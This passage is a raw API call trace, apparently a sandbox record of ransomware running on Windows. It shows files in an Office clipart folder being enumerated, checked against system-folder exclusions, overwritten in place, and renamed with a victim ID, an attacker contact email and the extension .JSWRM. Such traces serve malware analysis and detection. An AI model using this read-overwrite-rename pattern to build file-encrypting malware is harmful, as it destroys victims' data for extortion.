dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0076.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0076.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0076.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0076.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0076.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.327] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0076.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.328] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb90, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01152_.WMF", cAlternateFileName="")) returned 1 [0076.328] lstrcmpiW (lpString1="DD01152_.WMF", lpString2=".") returned 1 [0076.328] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="..") returned 1 [0076.328] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="...") returned 1 [0076.328] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="windows") returned -1 [0076.328] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="recovery") returned -1 [0076.328] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="perflogs") returned -1 [0076.328] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="documents and settings") returned -1 [0076.328] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.328] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="system volume information") returned -1 [0076.328] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="msocache") returned -1 [0076.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0076.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01152_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01152_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01152_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0076.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0076.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01152_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01152_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01152_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0076.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.329] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2960) returned 1 [0076.329] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb90) returned 0x24c1d0 [0076.329] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xb90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xb90, lpOverlapped=0x0) returned 1 [0076.330] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.330] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xb90, lpOverlapped=0x0) returned 1 [0076.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.331] CloseHandle (hObject=0x314) returned 1 [0076.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0076.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0076.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0076.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0076.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0076.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.331] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0076.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.332] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe04, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01157_.WMF", cAlternateFileName="")) returned 1 [0076.332] lstrcmpiW (lpString1="DD01157_.WMF", lpString2=".") returned 1 [0076.332] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="..") returned 1 [0076.332] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="...") returned 1 [0076.332] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="windows") returned -1 [0076.332] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="recovery") returned -1 [0076.332] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="perflogs") returned -1 [0076.332] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="documents and settings") returned -1 [0076.332] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.332] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="system volume information") returned -1 [0076.332] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="msocache") returned -1 [0076.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0076.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01157_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01157_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01157_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0076.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0076.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01157_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01157_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01157_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0076.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.333] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3588) returned 1 [0076.333] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe00) returned 0x24c1d0 [0076.333] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xe00, lpOverlapped=0x0) returned 1 [0076.336] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.337] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xe00, lpOverlapped=0x0) returned 1 [0076.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.337] CloseHandle (hObject=0x314) returned 1 [0076.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0076.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0076.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0076.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0076.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0076.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.337] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0076.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.338] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01160_.WMF", cAlternateFileName="")) returned 1 [0076.338] lstrcmpiW (lpString1="DD01160_.WMF", lpString2=".") returned 1 [0076.338] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="..") returned 1 [0076.338] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="...") returned 1 [0076.338] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="windows") returned -1 [0076.338] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="recovery") returned -1 [0076.338] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="perflogs") returned -1 [0076.338] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="documents and settings") returned -1 [0076.338] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.338] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="system volume information") returned -1 [0076.338] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="msocache") returned -1 [0076.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01160_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01160_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01160_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0076.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01160_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01160_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01160_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0076.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.339] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2228) returned 1 [0076.339] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8b0) returned 0x23fc98 [0076.339] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x8b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x8b0, lpOverlapped=0x0) returned 1 [0076.341] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.341] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x8b0, lpOverlapped=0x0) returned 1 [0076.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.341] CloseHandle (hObject=0x314) returned 1 [0076.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0076.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0076.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0076.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0076.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0076.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.342] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01160_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01160_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0076.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.342] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, 